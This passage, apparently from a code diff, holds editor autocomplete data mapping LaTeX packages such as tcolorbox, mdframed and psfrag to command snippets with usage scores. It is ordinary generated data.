'\\expandafter{$1}', + meta: 'abntex2cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'abntex2cite-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'abntex2cite-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'abntex2cite-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'abntex2cite-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'abntex2cite-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'abntex2cite-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'abntex2cite-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'abntex2cite-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'abntex2cite-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'abntex2cite-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'abntex2cite-cmd', + score: 
0.00021116765384691477, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'abntex2cite-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'abntex2cite-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'abntex2cite-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'abntex2cite-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'abntex2cite-cmd', + score: 0.0018957469739775527, + }, + ], + isodate: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'isodate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'isodate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'isodate-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'isodate-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'isodate-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'isodate-cmd', + score: 0.0018957469739775527, + }, + ], + tcolorbox: [ + { + caption: '\\tcbset{}', + snippet: '\\tcbset{$1}', + meta: 'tcolorbox-cmd', + score: 0.00012246447222402193, + }, + { + caption: '\\tcbuselibrary{}', + snippet: '\\tcbuselibrary{$1}', + meta: 'tcolorbox-cmd', + score: 4.347671035621014e-5, + }, + { + caption: '\\newtcolorbox[]{}[][]{}', + snippet: '\\newtcolorbox[$1]{$2}[$3][$4]{$5}', + meta: 'tcolorbox-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'tcolorbox-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'tcolorbox-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\newtcbox{}[][]{}', + snippet: '\\newtcbox{$1}[$2][$3]{$4}', + meta: 'tcolorbox-cmd', + score: 3.558785984219631e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'tcolorbox-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'tcolorbox-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'tcolorbox-cmd', + 
score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'tcolorbox-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'tcolorbox-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tcolorbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tcolorbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tcolorbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tcolorbox-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tcolorbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tcolorbox-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tcolorbox-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', 
+ snippet: '\\csedef{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tcolorbox-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tcolorbox-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tcolorbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tcolorbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tcolorbox-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tcolorbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tcolorbox-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tcolorbox-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tcolorbox-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 
0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tcolorbox-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tcolorbox-cmd', + score: 0.2864294797053033, + }, + ], + vmargin: [ + { + caption: '\\setmargins{}', + snippet: '\\setmargins{$1}', + meta: 'vmargin-cmd', + score: 3.138510306083217e-5, + }, + { + caption: '\\setmarginsrb{}{}{}{}{}{}{}{}', + snippet: '\\setmarginsrb{$1}{$2}{$3}{$4}{$5}{$6}{$7}{$8}', + meta: 'vmargin-cmd', + score: 0.0004759508676929243, + }, + { + caption: '\\setpapersize{}', + snippet: '\\setpapersize{$1}', + meta: 'vmargin-cmd', + score: 3.138510306083217e-5, + }, + ], + mdframed: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newmdenv[]{}', + snippet: '\\newmdenv[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.0008776774843208122, + }, + { + caption: '\\surroundwithmdframed[]{}', + snippet: '\\surroundwithmdframed[$1]{$2}', + meta: 'mdframed-cmd', + score: 5.535446508489438e-5, + }, + { + caption: '\\newmdtheoremenv{}{}', + snippet: '\\newmdtheoremenv{$1}{$2}', + meta: 'mdframed-cmd', + score: 3.558785984219631e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'mdframed-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'mdframed-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'mdframed-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + 
{ + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'mdframed-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'mdframed-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mdframed-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mdframed-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mdframed-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mdframed-cmd', + score: 0.0006607703576475988, + }, + { + caption: 
'\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mdframed-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mdframed-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mdframed-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mdframed-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mdframed-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mdframed-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + ], + cancel: [ + { + caption: '\\cancel{}', + snippet: '\\cancel{$1}', + meta: 'cancel-cmd', + score: 0.00017782514657538044, + }, + { + caption: '\\cancelto{}{}', + snippet: '\\cancelto{$1}{$2}', + meta: 'cancel-cmd', + score: 7.809089624140706e-5, + }, + ], + textcase: [ + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'textcase-cmd', + score: 2.341195220791228, + }, + ], + libertine: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'libertine-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'libertine-cmd', + score: 0.008565354665444157, + }, + ], + flushend: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'flushend-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'flushend-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'flushend-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'flushend-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'flushend-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'flushend-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: 
'\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'flushend-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'flushend-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'flushend-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'flushend-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flushend-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'flushend-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'flushend-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flushend-cmd', + score: 0.008565354665444157, + }, + ], + psfrag: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psfrag-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'psfrag-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'psfrag-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'psfrag-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'psfrag-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'psfrag-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'psfrag-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'psfrag-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'psfrag-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'psfrag-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psfrag-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'psfrag-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'psfrag-cmd', + score: 0.004649150613625593, + }, + ], + 
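+ // Each entry in these per-package arrays follows the same shape: a display
+ // `caption`, an Ace-style `snippet` whose $1..$n markers are editor tab
+ // stops, a `meta` tag of the form '<package>-cmd', and a numeric `score`
+ // (apparently corpus usage frequency) used to rank completions. A minimal,
+ // hypothetical consumer could pick the highest-scoring candidate like so
+ // (`insertSnippet` is an assumed editor helper, not defined in this file):
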